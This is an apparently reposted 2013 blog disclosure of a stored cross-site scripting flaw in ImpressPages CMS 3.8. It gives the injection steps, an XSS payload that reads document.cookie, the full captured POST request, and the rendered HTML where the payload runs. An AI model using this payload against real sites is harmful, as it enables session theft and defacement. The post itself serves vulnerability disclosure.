Son Dakika
bltema.blogspot.com sitesinde sizi muhteşem temalar bekliyor..Hemen ziyaret etmeye ne dersiniz ??
24 Kasım 2013 Pazar

ImpressPages CMS 3.8 - Stored XSS Vulnerability

02:48
1) log into the admin panel
  
2)click on advanced tab >> in the button title field enter the payload
"><img src=x onerror=prompt(document.cookie);>
  
  
request:
  
POST /cms/ImpressPages/?cms_action=manage HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 538
Cookie: ses11565=2v920trpg7sl8aghg3aj297su5
Pragma: no-cache
Cache-Control: no-cache
  
g=standard&m=content_management&a=savePageOptions&securityToken=4496a2385a44fe257b857f04a3240f53&pageOptions%5BbuttonTitle%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt(document.cookie)%3B%3E+&pageOptions%5Bvisible%5D=1&pageOptions%5BcreatedOn%5D=2009-08-08&pageOptions%5BlastModified%5D=2012-01-21&pageOptions%5BpageTitle%5D=Home&pageOptions%5Bkeywords%5D=&pageOptions%5Bdescription%5D=&pageOptions%5Burl%5D=home&pageOptions%5Btype%5D=default&pageOptions%5BredirectURL%5D=&pageOptions%5Brss%5D=0&pageOptions%5Blayout%5D=home.php&revisionId=91
  
  
3) refresh the page and we can see that the payload gets executed.
  
  
  
  
</head>
<body class="manage" >
  
<div class="theme clearfix">
    <header class="clearfix col_12">
        <div class="logo ipModuleInlineManagement ipmLogo "
 data-cssclass=''>
style=" ">
        xyz.com    </a>
</div>
  
        <div class="right">
            <span class="currentPage">"><img src=x
onerror=prompt(document.cookie);> </span>
            <a href="#" class="topmenuToggle"> </a>
            <div class="topmenu">
                        <ul class="level1">

0 yorum:

Yorum Gönder

 
Footer'ı Göster